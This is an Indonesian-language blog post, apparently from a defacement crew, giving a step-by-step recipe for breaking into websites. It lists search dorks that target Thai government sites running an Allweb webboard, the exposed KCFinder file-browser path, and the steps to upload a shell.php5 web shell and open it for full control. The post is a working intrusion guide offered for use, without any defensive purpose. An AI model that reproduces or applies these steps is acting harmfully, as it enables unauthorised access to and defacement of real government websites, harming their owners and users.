Tutor Deface Metode KcFinder Webform Upload Shell

Oleh Z1BeeGans
Pada Februari 21, 2021


Hay guys, Kali ini saya  akan share tutor deface Proof Of Concept KcFinder Webform + Upload Shell Backdoor ,Tentunya Mudah Gan.

Oke Langsung Ke bahan"nya gan :


- Dorknya ~>


intitle:webboard site:.go.th


"by Allweb Technology"


(Kembangin lagi guys :v)


- Shell backdoor Ext : shell.php5

- Exploit ~>


webboard/plugins/editors/kcfinder/browse.php


[PATH]/webboard/plugins/editors/kcfinder/browse.php

- Cara Manggil/Ngakses Shell ~>


Site.com/webboard/images/files/shell.php5


- STEP BY STEP -


1. Dorking Pake dork di atas, pilih salah satu site yang menurut lu vuln


2. Tambahkan Exploit contohnya ~> site.com/webboard/plugins/editors/kcfinder/browse.php




3. Upload Shell Ext Shell.php5, Jika Sudah? Panggil shell kalian gan ~>


Contoh ~> site.com/images/files/shell.php5



4. Mudah kan gan? Wooh jelas sesudah didalam Web shell, terserah luh mau ngapain aja :v


Sekian dari saya. Semoga bermanfaat guys.



  It's Me Z1BeeGans

- Manusia Tersakiti Team -


Anda mungkin menyukai postingan ini